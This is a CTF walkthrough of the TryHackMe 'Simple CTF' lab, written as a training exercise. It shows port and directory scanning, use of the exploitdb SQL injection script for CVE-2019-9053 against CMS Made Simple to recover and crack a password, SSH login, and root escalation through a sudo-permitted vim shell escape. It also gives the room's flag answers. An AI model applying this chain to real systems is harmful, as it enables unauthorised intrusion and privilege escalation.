Post

[CTF] Tryhackme - Simple CTF

[CTF] Tryhackme - Simple CTF

TryHackMe- Simple CTF

Questions:

  • How many services are running under port 1000?
  • What is running on the higher port?
  • What’s the CVE you’re using against the application?
  • To what kind of vulnerability is the application vulnerable?
  • What’s the password?
  • Where can you login with the details obtained?
  • What’s the user flag?
  • Is there any other user in the home directory? What’s its name?
  • What can you leverage to spawn a privileged shell?
  • What’s the root flag?

How many services are running under port 1000?

We start with our loved nmap scan. We use the Parameter -p 0-1000 because the question asks for it. Also we use -sV to see Services and Versions.

1
2
3
4
5
6
7
8
9
10
11
12
13
 └─$ nmap -sV -p 0-1000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 14:46 CST
Nmap scan report for 10.10.118.214
Host is up (0.24s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.31 seconds

Answer: 2

What is running on the higher port?

Now without Portscan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ nmap -sV $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 14:48 CST
Nmap scan report for 10.10.118.214
Host is up (0.23s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.60 seconds

Answer: ssh

What’s the CVE you’re using against the application?

Okay we have to optain more information. We can check exploitdb for the versions of vsftpd and Openssh 7.2pbut lets check if we find some more things.

With gobuster we search for hidden directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(admin㉿PREDATOR-01)-[~]
└─$ gobuster -w Downloads/common.txt dir -u $ip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.118.214
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                Downloads/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/simple               (Status: 301) [Size: 315] [--> http://10.10.118.214/simple/]
Progress: 1942 / 1943 (99.95%)
===============================================================
Finished
===============================================================

We found /simple - lets have a look.

On the bottom of the page we find:

1
2
Copyright 2004 - 2024 - CMS Made Simple
This site is powered by CMS Made Simple version 2.2.8

Could be that there is an exploit for made simple. Lets have a look in the robot.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#
# "$Id: robots.txt 3494 2003-03-19 15:37:44Z mike $"
#
#   This file tells search engines not to index your CUPS server.
#
#   Copyright 1993-2003 by Easy Software Products.
#
#   These coded instructions, statements, and computer programs are the
#   property of Easy Software Products and are protected by Federal
#   copyright law.  Distribution and use rights are outlined in the file
#   "LICENSE.txt" which should have been included with this file.  If this
#   file is missing or damaged please contact Easy Software Products
#   at:
#
#       Attn: CUPS Licensing Information
#       Easy Software Products
#       44141 Airport View Drive, Suite 204
#       Hollywood, Maryland 20636-3111 USA
#
#       Voice: (301) 373-9600
#       EMail: cups-info@cups.org
#         WWW: http://www.cups.org
#

User-agent: *
Disallow: /


Disallow: /openemr-5_0_1_3 
#
# End of "$Id: robots.txt 3494 2003-03-19 15:37:44Z mike $".

Interesting is mike which could be username.

We check if there is a exploit for CMS Made Simple version 2.2.8.

1
2
3
4
5
6
7
$ searchsploit cms made simple 2.2.8
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                 |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection                                                                                                                                       | php/webapps/46635.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Seems it is vulnerable for SQL Injection! Lets check the Pythion script.

1
2
3
4
5
6
7
8
9
10
└─$ cat /usr/share/exploitdb/exploits/php/webapps/46635.py |head
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

Perfect, that looks like a good start.

Answer: CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

We got that already in our previous question.

Answer: SQLi

What’s the password?

We use the Python Script from exploitdb. First we copy it into our Path. I got some errors because of missing modules, so I installed them via pip.

In my case there was requests missing.

sudo pip3 install requests

If you start the script, it says which parameter we need:

1
2
3
4
5
6
┌──(admin㉿PREDATOR-01)-[~/termcolor-2.4.0/src]
└─$ python3 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.

So lets use it.

$ python3 46635.py -u http://$ip/simple --crack -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt

After a few minutes we get a result:

1
2
3
4
5
6
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Perfect, we have cracked the password.

Answer: secret

Where can you login with the details obtained?

Well, we have username, password and an open port 2222 with ssh.

Answer: ssh

What’s the user flag?

We connect via ssh on port 2222.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ ssh mitch@10.10.118.214 -p 2222
The authenticity of host '[10.10.118.214]:2222 ([10.10.118.214]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.118.214]:2222' (ED25519) to the list of known hosts.
mitch@10.10.118.214's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!

Answer: G00d j0b, keep up!

Is there any other user in the home directory? What’s its name?

In our ssh session we navigate a bit:

1
2
3
4
5
6
7
$ pwd
/home/mitch
$ cd ..
$ ls
mitch  sunbath
$

Answer: sunbath

What can you leverage to spawn a privileged shell?

With sudo -l we can check, what we are allowed to do with root:

1
2
3
4
5
$ bash -i
mitch@Machine:/home$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
mitch@Machine:/home$

seems like we can use vim to spawn a privliged shell.

Answer: vim

What’s the root flag?

Lets try to spawn an interactive shell: https://gtfobins.github.io/gtfobins/vim/

vim -c ':!/bin/sh'

1
2
3
4
5
6
7
8
9
10
11
12
13
$ vim -c ':!/bin/sh'

$ sudo vim


Press ENTER or type command to continue
# pwd
/
# cd /root
# ls
root.txt
# cat root.txt
W3ll d0n3. You made it!

Answer: W3ll d0n3. You made it!

Thoughts:

This CTF is interesting and we have to search for a CVE, which could be interesting. Unfortunately I did a lot of troubleshooting on the Python Script regarding missing Modules and Syntax errors. That is why I didnt enjoy it as much as the others so far..

What did we learn?

  • using nmap for scan open ports and versions
  • using gobuster for search for hidden directories
  • using searchsploit to find a vulnerablity
  • using a python script to crack the password
  • using vim to spawn an interactive shell
This post is licensed under CC BY 4.0 by the author.